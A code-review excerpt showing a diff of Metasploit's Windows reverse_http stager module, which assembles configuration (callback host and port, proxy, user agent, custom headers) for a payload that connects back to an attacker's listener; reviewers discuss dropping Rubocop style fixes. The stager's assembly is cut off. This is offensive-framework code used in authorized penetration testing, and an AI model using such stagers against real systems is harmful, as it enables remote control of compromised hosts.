lib/msf/core/payload/windows/reverse_http.rb

```diff
@@ -1,240 +1,235 @@
-      conf[:proxy_host]     = ds['HttpProxyHost']
-      conf[:proxy_port]     = ds['HttpProxyPort']
-      conf[:proxy_user]     = ds['HttpProxyUser']
-      conf[:proxy_pass]     = ds['HttpProxyPass']
-      conf[:proxy_type]     = ds['HttpProxyType']
-      conf[:custom_headers] = get_custom_headers(ds)
-    else
-      # Otherwise default to small URIs
-      conf[:url]        = luri + generate_small_uri
+  ###
+
+  module Payload::Windows::ReverseHttp
+    include Msf::Payload::TransportConfig
+    include Msf::Payload::Windows
+    include Msf::Payload::Windows::BlockApi
+    include Msf::Payload::Windows::Exitfunk
+    include Msf::Payload::UUID::Options
+
+    #
+    # Register reverse_http specific options
+    #
+    def initialize(*args)
+      super
+      register_advanced_options(
+        [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] +
+        Msf::Opt.stager_retry_options +
+        Msf::Opt.http_header_options +
+        Msf::Opt.http_proxy_options
+      )
     end
 
-    generate_reverse_http(conf)
-  end
+    #
+    # Generate the first stage
+    #
+    def generate(opts = {})
+      ds = opts[:datastore] || datastore
+      conf = {
+        ssl: opts[:ssl] || false,
+        host: ds['LHOST'] || '127.127.127.127',
+        port: ds['LPORT'],
+        retry_count: ds['StagerRetryCount'],
+        retry_wait: ds['StagerRetryWait']
+      }
+
+      # Add extra options if we have enough space
+      if available_space.nil? || required_space <= available_space
+        conf[:url] = luri + generate_uri(opts)
+        conf[:exitfunk] = ds['EXITFUNC']
+        conf[:ua] = ds['HttpUserAgent']
+        conf[:proxy_host] = ds['HttpProxyHost']
+        conf[:proxy_port] = ds['HttpProxyPort']
+        conf[:proxy_user] = ds['HttpProxyUser']
+        conf[:proxy_pass] = ds['HttpProxyPass']
+        conf[:proxy_type] = ds['HttpProxyType']
+        conf[:custom_headers] = get_custom_headers(ds)
+      else
+        # Otherwise default to small URIs
+        conf[:url] = luri + generate_small_uri
+      end
 
-  #
-  # Generate the custom headers string
-  #
-  def get_custom_headers(ds)
-    headers = ""
-    headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader']
-    headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
-    headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']
-
-    if headers.length > 0
-      headers
-    else
-      nil
+      generate_reverse_http(conf)
     end
-  end
 
-  #
-  # Generate and compile the stager
-  #
-  def generate_reverse_http(opts={})
-    combined_asm = %Q^
+    #
+    # Generate the custom headers string
+    #
+    def get_custom_headers(ds)
+      headers = ''
+      headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader']
+      headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
+      headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']
+
+      if !headers.empty?
```

Comment:
Rubocop isn't required for the core files just yet, it would be easier to just drop those code changes entirely for now to keep a tidier history in this PR/future git blames :+1:

Reply:
Pretty sure I pulled out all Rubocop fixes in the core libs